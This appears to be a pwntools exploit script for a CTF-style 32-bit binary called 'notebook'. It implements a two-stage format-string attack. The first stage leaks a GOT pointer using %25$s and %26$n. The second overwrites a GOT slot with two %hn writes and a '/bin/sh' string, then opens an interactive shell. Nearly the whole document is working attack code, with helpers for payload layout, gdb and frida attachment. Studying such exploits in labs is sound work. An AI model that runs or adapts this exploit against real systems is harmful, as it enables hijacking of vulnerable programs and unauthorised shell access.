
notebook

...
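    # Switches (non-zero = on). The script relies on `from pwn import *` earlier in
    # the file (process / remote / context / gdb / u32 come from there).
    Debug=0              # attach gdb to the local process and pause before each stage
    Local=1              # 1: run Local_path locally, 0: connect to Remote_addr:Port
    Frida=0              # attach frida_script_path to the local process (Local only)
    Debug_pwntools=1     # context.log_level = "debug": dump every send()/recv()

    # Constants
    Local_path='./notebook'

    Remote_addr=''       # placeholder: fill in before setting Local=0
    Port=1               # placeholder: fill in before setting Local=0

    frida_script_path='./frida.js'

    # Target addresses (32-bit, non-PIE binary, fixed .got/.bss). The roles below are
    # what the payloads do with each address; which symbol owns each slot is not
    # visible here (the original labels the leak 'sys', i.e. presumably system@got).
    read_addr=0x0804A02C     # stage 1 dumps the 4-byte pointer stored here (%25$s)
    write_addr=0x0804A014    # stage 2 overwrites this slot with that pointer (two %hn)
    globallength=0x0804A06C  # stage 1 also writes printf's running byte count here (%26$n)


    def split_halves(value):
        """Return (high16, low16) of a 32-bit value: the two halves each %hn writes."""
        return (value >> 16) & 0xFFFF, value & 0xFFFF


    def fmt_pad(count):
        """Return b'%<count>x', which makes printf emit `count` more bytes.

        count == 0 yields b'' -- the original emitted '%0x' in that case, which
        prints at least one character and so overshoots the %hn count by one
        when the two halves are equal.  A negative count cannot be padded away,
        so it is rejected instead of silently becoming a '-' (left-justify) flag.
        NOTE: for 1 <= count <= 7 the popped argument's hex digits may exceed the
        width and overshoot; '%<count>c' would be exact, but 'x' is what the
        original sent and is kept here.
        """
        if count < 0:
            raise ValueError("cannot pad by %d bytes: target value too small for this layout" % count)
        if count == 0:
            return b""
        return b"%" + str(count).encode() + b"x"


    def build_leak_payload(leak_addr, count_addr):
        """Stage 1 format string: leak the pointer at `leak_addr`, scribble the byte count into `count_addr`.

        Layout (the input buffer starts at printf argument 21):
        6 x 'a' | %25$s | 5 x 'a' | p32(leak_addr) at arg 25 | p32(count_addr) at arg 26 | %26$n
        The reply therefore starts with six 'a's followed by the raw pointer bytes.
        %26$n stores the number of bytes printed so far (19 + strlen of the leak)
        into count_addr -- presumably to lift a length limit on the next input; confirm
        against the binary.
        """
        import struct
        return (b"a" * 6 + b"%25$s" + b"a" * 5
                + struct.pack("<I", leak_addr) + struct.pack("<I", count_addr)
                + b"%26$n" + b"\n")


    def build_hn_payload(target, value):
        """Stage 2 format string: write the 32-bit `value` to `target` with two %hn writes.

        Layout: '/bin/sh' + 0x18 (8 bytes) | p32(target) at arg 23 | p32(target + 2)
        at arg 24 | pad | %hn | pad | %hn.  The smaller half is written first so
        each pad only has to *grow* printf's running count, which already equals
        len(head) once the 16-byte header has been echoed.
        The 0x18 byte after '/bin/sh' is kept from the original payload; what the
        target does with it is not visible here.

        Raises ValueError (from fmt_pad) if the smaller half is below the header length.
        """
        import struct
        high, low = split_halves(value)
        head = b"/bin/sh\x18" + struct.pack("<I", target) + struct.pack("<I", target + 2)
        printed = len(head)   # bytes printf has already emitted before the first pad
        if high > low:
            # low half first (%23$hn -> target), then raise the count to the high half (%24$hn -> target+2)
            tail = fmt_pad(low - printed) + b"%23$hn" + fmt_pad(high - low) + b"%24$hn"
        else:
            # high half first (%24$hn -> target+2), then the low half (%23$hn -> target)
            tail = fmt_pad(high - printed) + b"%24$hn" + fmt_pad(low - high) + b"%23$hn"
        return head + tail + b"\n"


    def _attach_frida(pid):
        """Attach frida_script_path to `pid`, load it, and return the script (keep it referenced).

        Two fixes versus the original: it opened the literal file name
        'frida_script_path' instead of the variable, and it never called
        script.load(), so the script was created but never ran.
        """
        import frida

        def on_message(message, data):
            # 'send' messages carry a payload; error messages do not, so fall back to the whole dict
            print("[*] %s" % (message.get('payload', message),))

        session = frida.attach(pid)
        with open(frida_script_path) as f:
            jscode = f.read()
        script = session.create_script(jscode)
        script.on('message', on_message)
        script.load()
        return script


    def _pause():
        """Block on Enter so a debugger can be attached / inspected before continuing."""
        try:
            raw_input()
        except NameError:   # Python 3
            input()


    def main():
        """Two-stage format-string attack: leak a pointer, write it over a GOT slot, get a shell."""
        # `io` rather than `process`: the original rebound the name `process`,
        # shadowing the pwntools function it had just called.
        if Local != 0:
            io = process(Local_path)
        else:
            io = remote(Remote_addr, Port)

        if Debug_pwntools != 0:
            context.log_level = "debug"

        frida_script = None
        if Frida != 0 and Local != 0:
            frida_script = _attach_frida(io.pid)   # held for the whole session

        if Debug != 0 and Local != 0:
            context.terminal = ['tmux', 'splitw', '-h']
            gdb.attach(io)

        if Debug != 0:
            _pause()

        # Stage 1: leak the pointer stored at read_addr.
        io.recv()
        io.send(build_leak_payload(read_addr, globallength))
        io.recv(6)                    # the six leading 'a's
        # recvn(): exactly 4 bytes -- recv(4) may return fewer and u32 would then fail on them.
        # Caveat: %s stops at the first NUL, so a pointer containing a 0x00 byte leaks
        # short and the bytes read here are the 'a' filler, not the pointer.
        leaked = u32(io.recvn(4))
        # Earlier variants (per the original's commented-out code) leaked strlen@got and
        # derived system/free from libc offsets; this version writes the leak as-is.
        write_value = leaked
        print('sys :' + hex(write_value))
        io.recv()

        # Stage 2: write write_value over write_addr with two %hn writes.
        high, low = split_halves(write_value)
        print(hex(high))
        print(hex(low))
        if high > low:
            print('先写低位')
        io.send(build_hn_payload(write_addr, write_value))

        if Debug != 0:
            _pause()
        io.interactive()


    if __name__ == "__main__":
        main()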
     

 
